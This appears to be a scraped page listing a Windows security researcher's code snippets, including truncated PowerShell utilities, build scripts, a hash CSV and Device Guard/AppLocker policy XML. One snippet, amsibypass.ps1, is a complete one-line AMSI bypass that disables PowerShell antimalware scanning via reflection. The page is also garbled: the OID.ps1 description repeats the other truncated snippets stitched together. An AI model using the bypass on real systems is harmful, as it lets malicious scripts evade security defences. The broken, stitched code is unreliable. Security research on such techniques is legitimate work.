Matt Graeber mattifestation

## build.bat
csc test.cs
ildasm /OUT=test.il test.exe
type moduleinititalizer.il >> test.il
ilasm /EXE /OUTPUT=test.exe test.il

## HashMismatch.ps1
Install-Module -Name PSScriptAnalyzer -RequiredVersion '1.11.0' -Force
$ModuleInfo = Get-Module -ListAvailable -Name PSScriptAnalyzer | ? { $_.Version -eq '1.11.0' }
$ModuleDir = Split-Path -Parent $ModuleInfo.Path
# C:\Program Files\WindowsPowerShell\Modules\PSScriptAnalyzer\1.11.0 for me

$NewtonsoftPath = "$ModuleDir\Newtonsoft.Json.dll"
$ManifestPath = "$ModuleDir\PSScriptAnalyzer.psd1"

# Requires Win 10 Enterprise to use the ConfigCI cmdlets
$ModuleFileInfo = Get-SystemDriver -UserPEs -NoShadowCopy -ScanPath $ModuleDir -PathToCatroot $ModuleDir

## ProcessMitigationOption.ps1
function ConvertTo-ProcessMitigationOption {
    [OutputType([String])]
    param (
        [Switch]
        $DEPEnable,

        [Switch]
        $DEPATLThunkEnable,

        [Switch]

## ConvertFromSID.ps1
function ConvertFrom-SID {
    param (
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        [ValidateNotNullOrEmpty()]
        $SID
    )

    $AccountSIDInstance = Get-CimInstance -ClassName Win32_AccountSID -Filter "Setting = 'Win32_SID.SID=`"$SID`"'"

## amsibypass.ps1
[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141)

## CatalogStoreHashes.csv
"Algorithm","FileHash"
"SHA1","00083ACBE326F29CE6B4900869426640FFC1F14D"
"SHA1","008BE24EDEA854743622BD1EE748D85E9B5402C8"
"SHA1","00953C7E137E01D555EDA3968610355E9CBCDF71"
"SHA1","010009033B9E03BA22C311A4284E673BA6394972"
"SHA1","01396BB9E2633BC0DF02F4456D00791CEC0386A6"
"SHA1","0190ECC0144AC48107208CD8F82CE84F9853DB23"
"SHA1","01914EC642D0439572E204EFF8A235526B7365A3"
"SHA1","0199A56244408EFBD2B1A92E2FF79B1C0A63BCD4"
"SHA1","01C270EB9A5B431C38D2375769E7BC99A0049FBC"

## NanoServerBareMetalCI.xml
<?xml version="1.0" encoding="utf-8"?>
<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
  <VersionEx>1.0.0.0</VersionEx>
  <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
  <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
  <Rules>
    <Rule>
      <Option>Enabled:Unsigned System Integrity Policy</Option>
    </Rule>
    <Rule>

## AssocEnum.ps1
function Get-AssociatedClassRelationship {
    param (
        [String]
        $Namespace = 'root/cimv2'
    )

    Get-CimClass -Namespace $Namespace | ? { $_.CimClassQualifiers['Association'] -and (-not $_.CimClassQualifiers['Abstract']) } | % {
        $KeyQualifiers = @($_.CimClassProperties | ? { $_.Qualifiers['key'] })

        if ($KeyQualifiers.Count -eq 2) {

## AppIdPolicy.xsd
<?xml version="1.0"?>
<xs:schema attributeFormDefault="unqualified"
           elementFormDefault="qualified"
           xmlns:xs="http://www.w3.org/2001/XMLSchema"
           version="1.0">

  <!-- -->
  <!-- AppLockerPolicy-Type -->
  <!-- -->
  <xs:element name="AppLockerPolicy"

## OID.ps1
function ConvertTo-Oid {
<#
.SYNOPSIS

Decodes a DER encoded ASN.1 object identifier (OID)

Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause

.DESCRIPTION
	csc test.cs
	ildasm /OUT=test.il test.exe
	type moduleinititalizer.il >> test.il
	ilasm /EXE /OUTPUT=test.exe test.il
	Install-Module -Name PSScriptAnalyzer -RequiredVersion '1.11.0' -Force
	$ModuleInfo = Get-Module -ListAvailable -Name PSScriptAnalyzer \| ? { $_.Version -eq '1.11.0' }
	$ModuleDir = Split-Path -Parent $ModuleInfo.Path
	# C:\Program Files\WindowsPowerShell\Modules\PSScriptAnalyzer\1.11.0 for me

	$NewtonsoftPath = "$ModuleDir\Newtonsoft.Json.dll"
	$ManifestPath = "$ModuleDir\PSScriptAnalyzer.psd1"

	# Requires Win 10 Enterprise to use the ConfigCI cmdlets
	$ModuleFileInfo = Get-SystemDriver -UserPEs -NoShadowCopy -ScanPath $ModuleDir -PathToCatroot $ModuleDir
	function ConvertTo-ProcessMitigationOption {
	[OutputType([String])]
	param (
	[Switch]
	$DEPEnable,

	[Switch]
	$DEPATLThunkEnable,

	[Switch]
	function ConvertFrom-SID {
	param (
	[Parameter(Position = 0, Mandatory = $True)]
	[String]
	[ValidateNotNullOrEmpty()]
	$SID
	)

	$AccountSIDInstance = Get-CimInstance -ClassName Win32_AccountSID -Filter "Setting = 'Win32_SID.SID=`"$SID`"'"
	"Algorithm","FileHash"
	"SHA1","00083ACBE326F29CE6B4900869426640FFC1F14D"
	"SHA1","008BE24EDEA854743622BD1EE748D85E9B5402C8"
	"SHA1","00953C7E137E01D555EDA3968610355E9CBCDF71"
	"SHA1","010009033B9E03BA22C311A4284E673BA6394972"
	"SHA1","01396BB9E2633BC0DF02F4456D00791CEC0386A6"
	"SHA1","0190ECC0144AC48107208CD8F82CE84F9853DB23"
	"SHA1","01914EC642D0439572E204EFF8A235526B7365A3"
	"SHA1","0199A56244408EFBD2B1A92E2FF79B1C0A63BCD4"
	"SHA1","01C270EB9A5B431C38D2375769E7BC99A0049FBC"
	<?xml version="1.0" encoding="utf-8"?>
	<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
	<VersionEx>1.0.0.0</VersionEx>
	<PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
	<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
	<Rules>
	<Rule>
	<Option>Enabled:Unsigned System Integrity Policy</Option>
	</Rule>
	<Rule>
	function Get-AssociatedClassRelationship {
	param (
	[String]
	$Namespace = 'root/cimv2'
	)

	Get-CimClass -Namespace $Namespace \| ? { $_.CimClassQualifiers['Association'] -and (-not $_.CimClassQualifiers['Abstract']) } \| % {
	$KeyQualifiers = @($_.CimClassProperties \| ? { $_.Qualifiers['key'] })

	if ($KeyQualifiers.Count -eq 2) {
	<?xml version="1.0"?>
	<xs:schema attributeFormDefault="unqualified"
	elementFormDefault="qualified"
	xmlns:xs="http://www.w3.org/2001/XMLSchema"
	version="1.0">

	<!-- -->
	<!-- AppLockerPolicy-Type -->
	<!-- -->
	<xs:element name="AppLockerPolicy"
	function ConvertTo-Oid {
	<#
	.SYNOPSIS

	Decodes a DER encoded ASN.1 object identifier (OID)

	Author: Matthew Graeber (@mattifestation)
	License: BSD 3-Clause

	.DESCRIPTION